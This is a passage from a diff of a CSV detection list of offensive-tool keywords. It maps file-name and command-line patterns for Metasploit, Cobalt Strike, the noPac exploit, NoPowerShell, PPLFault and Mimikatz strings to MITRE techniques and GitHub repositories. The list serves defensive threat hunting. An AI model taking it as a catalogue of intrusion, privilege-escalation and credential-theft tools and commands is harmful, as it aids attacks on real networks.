successfully*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" -"*no_session_payload.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA4pz*","offensive_tool_keyword","CloakNDaggerC2","A C2 framework designed around the use of public/private RSA key pairs to sign and authenticate commands being executed. This prevents MiTM interception of calls and ensures opsec during delicate operations.","T1090 - T1090.003 - T1071 - T1071.001 - T1553 - T1553.002","TA0011 - TA0042 - TA0003","N/A","N/A","C2","https://github.com/matt-culbert/CloakNDaggerC2","1","0","N/A","10","10","4","2","2023-10-04T12:32:38Z","2023-04-28T01:58:18Z" +"*no Mimik@tz - loaded successfully*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*no_session_payload.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*NoApiUser.exe*","offensive_tool_keyword","cobaltstrike","Use windows api to add users which can be used when net is unavailable","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/lengjibo/NetUser","1","1","N/A","10","10","410","90","2021-09-29T14:22:09Z","2020-01-09T08:33:27Z" "*noclient: failed to execute %s: %s*","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- file noclient CNC server for NOPEN*","T1053 - T1064 - T1059 - T1218","TA0002 - TA0007","N/A","N/A","Shell spawning","https://github.com/x0rz/EQGRP/blob/master/Linux/bin/noclient-3.3.2.3-linux-i386","1","0","N/A","N/A","10","4011","2166","2017-05-24T21:12:59Z","2017-04-08T14:03:59Z" "*node stealer.js *","offensive_tool_keyword","cuddlephish","Weaponized Browser-in-the-Middle (BitM) for Penetration Testers","T1185 - T1185.002 - T1071 - T1071.001 - T1556 - T1556.001","TA0009 - TA0006","N/A","N/A","Sniffing & Spoofing","https://github.com/fkasler/cuddlephish","1","0","N/A","10","2","152","10","2023-09-06T12:25:08Z","2023-08-02T14:30:41Z" -"*NoFault\NoFault.*","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","0","N/A","N/A","5","410","66","2023-10-03T20:00:34Z","2022-09-22T19:39:24Z" +"*NoFault\NoFault.*","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","0","N/A","N/A","5","411","68","2023-10-03T20:00:34Z","2022-09-22T19:39:24Z" "*NoFilter.exe *","offensive_tool_keyword","NoFilter","Tool for abusing the Windows Filtering Platform for privilege escalation. It can launch a new console as NT AUTHORITY\SYSTEM or as another user that is logged on to the machine.","T1548 - T1548.002 - T1055 - T1055.004","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/deepinstinct/NoFilter","1","0","N/A","9","3","257","42","2023-08-20T07:12:01Z","2023-07-30T09:25:38Z" "*NoFilter-main.zip*","offensive_tool_keyword","NoFilter","Tool for abusing the Windows Filtering Platform for privilege escalation. It can launch a new console as NT AUTHORITY\SYSTEM or as another user that is logged on to the machine.","T1548 - T1548.002 - T1055 - T1055.004","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/deepinstinct/NoFilter","1","1","N/A","9","3","257","42","2023-08-20T07:12:01Z","2023-07-30T09:25:38Z" -"*nop_shellcode.bin*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*nop_shellcode.bin*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*noPac * -dc-ip * --impersonate *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*noPac.* -create-child*","offensive_tool_keyword","POC","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","N/A","Exploitation tools","https://github.com/Ridter/noPac","1","0","N/A","N/A","7","643","112","2023-01-29T03:31:27Z","2021-12-13T10:28:12Z" "*noPac.* -dc-host *","offensive_tool_keyword","POC","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","N/A","Exploitation tools","https://github.com/Ridter/noPac","1","0","N/A","N/A","7","643","112","2023-01-29T03:31:27Z","2021-12-13T10:28:12Z" @@ -14139,18 +14302,18 @@ "*noPac.csproj.AssemblyReference.cache*","offensive_tool_keyword","POC","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","N/A","Exploitation tools","https://github.com/ricardojba/noPac","1","0","N/A","N/A","1","34","5","2021-12-19T17:42:12Z","2021-12-13T18:51:31Z" "*noPac.py*","offensive_tool_keyword","POC","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","N/A","Exploitation tools","https://github.com/Ridter/noPac","1","0","N/A","N/A","7","643","112","2023-01-29T03:31:27Z","2021-12-13T10:28:12Z" "*noPac.sln*","offensive_tool_keyword","POC","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","N/A","Exploitation tools","https://github.com/ricardojba/noPac","1","0","N/A","N/A","1","34","5","2021-12-19T17:42:12Z","2021-12-13T18:51:31Z" -"*NoPowerShell.cna*","offensive_tool_keyword","C2 related tools","PowerShell rebuilt in C# for Red Teaming purposes","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","761","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" -"*NoPowerShell.cna*","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","761","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" -"*NoPowerShell.Commands*","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","761","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" -"*NoPowerShell.dll*","offensive_tool_keyword","C2 related tools","PowerShell rebuilt in C# for Red Teaming purposes","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","761","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" -"*NoPowerShell.dll*","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","761","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" -"*nopowershell.exe*","offensive_tool_keyword","C2 related tools","PowerShell rebuilt in C# for Red Teaming purposes","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","761","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" -"*NoPowerShell.exe*","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","761","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" -"*NoPowerShell.sln*","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","761","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" -"*NoPowerShell/*.cs*","offensive_tool_keyword","C2 related tools","PowerShell rebuilt in C# for Red Teaming purposes","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","761","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" -"*NoPowerShell_trunk.zip*","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","761","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" -"*NoPowerShell32.dll*","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","761","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" -"*NoPowerShell64.dll*","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","761","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" +"*NoPowerShell.cna*","offensive_tool_keyword","C2 related tools","PowerShell rebuilt in C# for Red Teaming purposes","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","762","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" +"*NoPowerShell.cna*","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","762","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" +"*NoPowerShell.Commands*","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","762","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" +"*NoPowerShell.dll*","offensive_tool_keyword","C2 related tools","PowerShell rebuilt in C# for Red Teaming purposes","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","762","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" +"*NoPowerShell.dll*","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","762","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" +"*nopowershell.exe*","offensive_tool_keyword","C2 related tools","PowerShell rebuilt in C# for Red Teaming purposes","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","762","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" +"*NoPowerShell.exe*","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","762","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" +"*NoPowerShell.sln*","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","762","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" +"*NoPowerShell/*.cs*","offensive_tool_keyword","C2 related tools","PowerShell rebuilt in C# for Red Teaming purposes","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - 